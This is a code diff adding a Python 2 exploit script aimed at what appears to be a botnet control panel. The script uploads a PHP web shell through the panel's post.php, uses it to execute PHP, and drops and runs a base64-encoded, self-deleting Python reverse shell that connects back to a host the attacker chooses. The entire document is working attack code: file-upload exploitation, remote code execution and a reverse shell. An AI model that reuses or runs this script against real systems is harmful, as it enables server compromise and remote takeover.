|
| 1 | +#!/usr/bin/python2 |
| 2 | +# coding: utf-8 |
| 3 | +import requests |
| 4 | +import sys |
| 5 | +clear = "\x1b[0m" |
| 6 | +blue = "\x1b[1;34m" |
| 7 | +cyan = "\x1b[1;36m" |
| 8 | +red = "\x1b[1;31m" |
| 9 | +green = "\x1b[1;32m" |
| 10 | + |
| 11 | +def upload_shell(base_url): |
| 12 | + files={'upload1':('file.log.php', "<?php @assert(filter_input(0,woot,516)); ?>")} |
| 13 | + data={'slots': '1'} |
| 14 | + url = base_url + "/post.php" |
| 15 | + sys.stdout.write(cyan+"{*} Attempting shell upload..."+clear) |
| 16 | + sys.stdout.flush() |
| 17 | + try: |
| 18 | + requests.post(url=url, files=files, data=data) |
| 19 | + except Exception, e: |
| 20 | + sys.stdout.write(red+" [failed]\n"+clear) |
| 21 | + sys.stdout.flush() |
| 22 | + sys.exit("Stack Trace: \n%s" %(str(e))) |
| 23 | + try: |
| 24 | + output = execute_php(base_url=base_url, php="print md5('pwned');") |
| 25 | + except Exception, e: |
| 26 | + sys.stdout.write(red+" [failed]\n"+clear) |
| 27 | + sys.stdout.flush() |
| 28 | + sys.exit("Stack Trace: \n%s" %(str(e))) |
| 29 | + if "5e93de3efa544e85dcd6311732d28f95" in output: |
| 30 | + sys.stdout.write(green+" [success]\n"+clear) |
| 31 | + |
| 32 | +def upload_backconnect(base_url): |
| 33 | + sys.stdout.write(cyan+"{*} Uploading Backconnect..."+clear) |
| 34 | + encoded_shell = "IyEvdXNyL2Jpbi9weXRob24yCiMgY29kaW5nOiB1dGYtOAojIFNlbGYgRGVzdHJ1Y3RpbmcsIERhZW1vbmluZyBSZXZlcnNlIFBUWS4KIyBybSdzIHNlbGYgb24gcXVpdCA6MwojIFRPRE86CiMgMTogQWRkIGNyeXB0bwojIDI6IEFkZCBwcm9jbmFtZSBzcG9vZgppbXBvcnQgb3MKaW1wb3J0IHN5cwppbXBvcnQgcHR5CmltcG9ydCBzb2NrZXQKaW1wb3J0IGNvbW1hbmRzCgpzaGVsbG1zZyA9ICJceDFiWzBtXHgxYlsxOzM2bUdvdCByb290IHlldD9ceDFiWzBtXHJcbiIgIyBuZWVkeiBhc2NpaQoKZGVmIHF1aXR0ZXIobXNnKToKICAgIHByaW50IG1zZwogICAgb3MudW5saW5rKG9zLnBhdGguYWJzcGF0aChfX2ZpbGVfXykpICMgdW5jb21tZW50IGZvciBnb2dvc2VsZmRlc3RydWN0CiAgICBzeXMuZXhpdCgwKQoKZGVmIHJldmVyc2UoY2Job3N0LCBjYnBvcnQpOgogICAgdHJ5OgogICAgICAgIHVuYW1lID0gY29tbWFuZHMuZ2V0b3V0cHV0KCJ1bmFtZSAtYSIpCiAgICAgICAgaWQgPSBjb21tYW5kcy5nZXRvdXRwdXQoImlkIikKICAgIGV4Y2VwdCBFeGNlcHRpb246CiAgICAgICAgcXVpdHRlcignZ3JhYiB1bmFtZS9pZCBmYWlsJykKICAgIHRyeToKICAgICAgICBzb2NrID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCwgc29ja2V0LlNPQ0tfU1RSRUFNKQogICAgICAgIHNvY2suY29ubmVjdCgoY2Job3N0LCBpbnQoY2Jwb3J0KSkpCiAgICBleGNlcHQ6CiAgICAgICAgcXVpdHRlcignYWJvcnQ6IGNvbm5lY3Rpb24gZmFpbCcpCiAgICB0cnk6CiAgICAgICAgb3MuZHVwMihzb2NrLmZpbGVubygpLCAwKQogICAgICAgIG9zLmR1cDIoc29jay5maWxlbm8oKSwgMSkKICAgICAgICBvcy5kdXAyKHNvY2suZmlsZW5vKCksIDIpCiAgICBleGNlcHQ6CiAgICAgICAgcXVpdHRlcignYWJvcnQ6IGR1cDIgZmFpbCcpCiAgICB0cnk6CiAgICAgICAgb3MucHV0ZW52KCJISVNURklMRSIsICIvZGV2L251bGwiKQogICAgICAgIG9zLnB1dGVudigiUEFUSCIsICcvdXNyL2xvY2FsL3NiaW46L3Vzci9zYmluOi9zYmluOi9iaW46L3Vzci9sb2NhbC9iaW46L3Vzci9iaW4nKQogICAgZXhjZXB0IEV4Y2VwdGlvbjoKICAgICAgICBxdWl0dGVyKCdhYm9ydDogcHV0ZW52IGZhaWwnKQogICAgdHJ5OgogICAgICAgIHNvY2suc2VuZChzaGVsbG1zZykKICAgICAgICBzb2NrLnNlbmQoJ1x4MWJbMTszMm0nK3VuYW1lKyJcclxuIitpZCsiXHgxYlswbVxyXG4iKQogICAgZXhjZXB0IEV4Y2VwdGlvbjoKICAgICAgICBxdWl0dGVyKCdzZW5kIGlkL3VuYW1lIGZ1Y2t1cCcpCiAgICB0cnk6CiAgICAgICAgcHR5LnNwYXduKCcvYmluL2Jhc2gnKQogICAgZXhjZXB0IEV4Y2VwdGlvbjoKICAgICAgICBxdWl0dGVyKCdhYm9ydDogcHR5IHNwYXduIGZhaWwnKQogICAgcXVpdHRlcigncXVpdHRpbmcsIGNsZWFudXAnKQoKZGVmIG1haW4oYXJncyk6CiAgICBpZiBvcy5mb3JrKCkgPiAwOiAKICAgICAgICBvcy5fZXhpdCgwKQogICAgcmV2ZXJzZShzeXMuYXJndlsxXSwgc3lzLmFyZ3ZbMl0pCgppZiBfX25hbWVfXyA9PSAiX19tYWluX18iOgogICAgbWFpbihzeXMuYXJndikK" |
| 35 | + cbdrop = """$hack = "%s";$x = fopen("/tmp/x", "w+");fwrite($x, base64_decode($hack));fclose($x);echo "dongs";""" %(encoded_shell) |
| 36 | + lol = execute_php(base_url, php=php_encoder(cbdrop)) |
| 37 | + if "dongs" in lol: |
| 38 | + sys.stdout.write(green+" [done]\n"+clear) |
| 39 | + |
| 40 | +def execute_php(base_url, php): |
| 41 | + shell_url = base_url + "/logs/dump/file.log.php" |
| 42 | + data={'woot': php} |
| 43 | + r = requests.post(url=shell_url, data=data) |
| 44 | + return r.text |
| 45 | + |
| 46 | +def php_encoder(php): |
| 47 | + encoded = php.encode('base64') |
| 48 | + encoded = encoded.replace("\n", "") |
| 49 | + encoded = encoded.strip() |
| 50 | + code = "eval(base64_decode('%s'));" %(encoded) |
| 51 | + return code |
| 52 | + |
| 53 | +def pop_reverse(base_url, cb_host, cb_port): |
| 54 | + upload_shell(base_url) |
| 55 | + upload_backconnect(base_url) |
| 56 | + print "%s{*} Sending backconnect to %s%s:%s%s" %(cyan, green, cb_host, cb_port, clear) |
| 57 | + execute_php(base_url, php="system('python /tmp/x %s %s');" %(cb_host, cb_port)) |
| 58 | + print "%s{$} bl1ngbl1ng!!%s" %(blue, clear) |
| 59 | + |
| 60 | +def main(args): |
| 61 | + if len(args) != 4: |
| 62 | + sys.exit("use: %s http://bot.net/Panel hacke.rs 31337" %(args[0])) |
| 63 | + pop_reverse(base_url=args[1], cb_host=args[2], cb_port=args[3]) |
| 64 | + |
| 65 | +if __name__ == "__main__": |
| 66 | + main(args=sys.argv) |
0 commit comments